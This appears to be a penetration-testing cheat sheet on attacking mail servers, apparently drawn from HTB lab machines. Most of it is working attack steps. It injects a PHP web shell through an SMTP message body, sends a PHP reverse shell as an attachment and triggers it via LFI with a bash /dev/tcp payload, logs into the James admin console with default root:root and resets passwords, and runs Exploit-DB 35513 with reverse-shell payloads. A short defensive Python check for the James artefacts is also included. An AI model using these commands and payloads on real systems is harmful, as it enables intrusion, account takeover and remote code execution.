# Email SMTP

## Read emails

```
telnet 10.x.x.x 110
nc -nv 10.x.x.x 110
USER mindy
PASS hello
STAT
RETR 2

+OK Message follows
Delivered-To: mindy@localhost
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,
Here is your password.. blah blah blah
```

## Send email with telnet

* SMTP: 25
* Bonus: Inject PHP into the message body.. you will need an LFI to read/execute it though
* REF: [PBX-PhpEmailExploit](/04-webapps/pbx-elastix.md#email-php-injection)

```
telnet $IP 25
EHLO beep.htb               ..Any hello will work
VRFY hacked@localhost       ..rejected
VRFY asterisk@localhost     ..Verified
mail from:pwn@hacked.com
rcpt to:asterisk@localhost  ..Same as Verified
data                        ..Begin Email
Subject:Testing!

Hello                                        ..test #1
<?php echo "Php success"; ?>                 ..test #2
<?php echo system($_REQUEST['command']); ?>  ..test #3

.                                            ..to end the email
quit
```

## sendmail with attachment

* Instead of typing the SMTP dialogue (telnet, EHLO, ...) by hand, use the `sendEmail` tool; the flags below are its syntax
* Send a Reverse shell php

```
> sendEmail -t asterisk@localhost -o message-file=php-reverse-shell.php -u pwnd -s $IP:25 -f mike@mike.com
```

## execute and connect

* LFI Execution Example (for after you've sent the evil email)

```
> nc -nvlp 4444
> https://$IP/vtigercrm/graph.php?current_language=../../../../../../../../var/spool/mail/asterisk%00&module=Accounts&action

.. graph.php?lang=../../../var/mail/asterisk%00&module=Accounts&command=whoami HTTP/1.1
.. graph.php?lang=../../../var/mail/asterisk%00&module=Accounts&command=bash -i >& /dev/tcp/$IP/4444 0>&1 HTTP/1.1
                                                                         |
                                                                        Goal
```

## Files

```
cat /var/mail/asterisk
```

## Thunderbird

* If you have a user/pass, you can open Thunderbird to browse emails
* You might find a password that you could use for SSH too!! REF: solidstateHTB

```
thunderbird
create new account: email
mindy@10.x.x.x
password
read emails
```

## James Server 2.3.2

* Java Apache Mail Enterprise Server (JAMES)
  * Open source SMTP and POP3 mail transfer agent and NNTP news server
  * <https://james.apache.org/>
  * Default Login: **root:root**
* Connect and Reset user-email password
* Then use [Thunderbird](#thunderbird) email to look for clues

```
nmap -p- 10.x.x.x
PORT     STATE SERVICE
25/tcp   open  smtp   ..mail server will be present too
110/tcp  open  pop3   ..mail component
119/tcp  open  nntp   ..not sure this is related
4555/tcp open  rsip   ..JAMES connect port for admin tool!!


nc $IP 4555           ..telnet works too
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
admin:admin          ..fail
root:root            ..ok

help
listusers
setpassword admin password
setpassword mindy password  ..will update a user's email password
```

## James Server Exploit 2.3.2 (RCE)

* Exploit-DB 35513 will get you a full shell
* Requirements:
  * Default login: root/root
  * Must have a working ssh login user/pass (limited is ok)
  * Need to update the payload for reverse-connect
* Will add a weird user account: ../../../etc/bash\_completion.d
* Sends email to our 'weird' user-directory
* When anybody logs into ssh, we will get execution
* Confused?
  * Yes, you need an SSH login already.. but if it's limited it won't do much
  * This will get you a **full-shell**, instead of a limited one
  * Next step is to look for PrivEsc !!

```
searchsploit james
searchsploit -m linux/remote/35513.py

vim 35513.py
payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &'     ..optional

python 35513.py $IP
python2.7 ./35513.py 10.x.x.x
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.

ssh user@server  ..will pop the exploit
nc -nvlp 4444    ..listen
connected        ..with full shell
```
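
A defender-side check for the account and file artefacts described above, as an added example (not from the original page or the JAMES project): it flags admin-console accounts whose names contain path components, and files under `/etc/bash_completion.d` that look like delivered mail. The `listusers` output format, the sample accounts and the mail-header heuristic are assumptions.

```python
import os
import re

# Assumed shape of `listusers` output from the JAMES admin console (constructed sample).
SAMPLE_LISTUSERS = """\
Existing accounts 4
user: james
user: mindy
user: mailadmin
user: ../../../etc/bash_completion.d
"""

# Headers a stored mail carries; a real shell completion script has none of them (heuristic).
MAIL_HEADER = re.compile(rb"^(Return-Path|Message-ID|Delivered-To|Received):", re.I | re.M)


def suspicious_users(listusers_output):
    """Return account names that could resolve outside the mail store directory."""
    flagged = []
    for line in listusers_output.splitlines():
        if not line.lower().startswith("user:"):
            continue
        name = line.split(":", 1)[1].strip()
        # Path separators, '..' or NUL bytes never belong in a mailbox name.
        if "/" in name or "\\" in name or ".." in name or "\x00" in name:
            flagged.append(name)
    return flagged


def mail_like_files(directory="/etc/bash_completion.d"):
    """Return files under `directory` whose first 4 KiB contain mail headers."""
    hits = []
    for root, _dirs, files in os.walk(directory):
        for fname in sorted(files):
            path = os.path.join(root, fname)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(4096)
            except OSError:
                continue  # unreadable entry: skip rather than abort the sweep
            if MAIL_HEADER.search(head):
                hits.append(path)
    return hits


if __name__ == "__main__":
    print("accounts to review:", suspicious_users(SAMPLE_LISTUSERS))
    print("mail-like files:", mail_like_files())
```

Any hit from either function is a reason to remove the account, inspect the flagged files before the next interactive login, and change the admin console password from its default.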

## More

* <https://book.hacktricks.xyz/pentesting/pentesting-smtp>

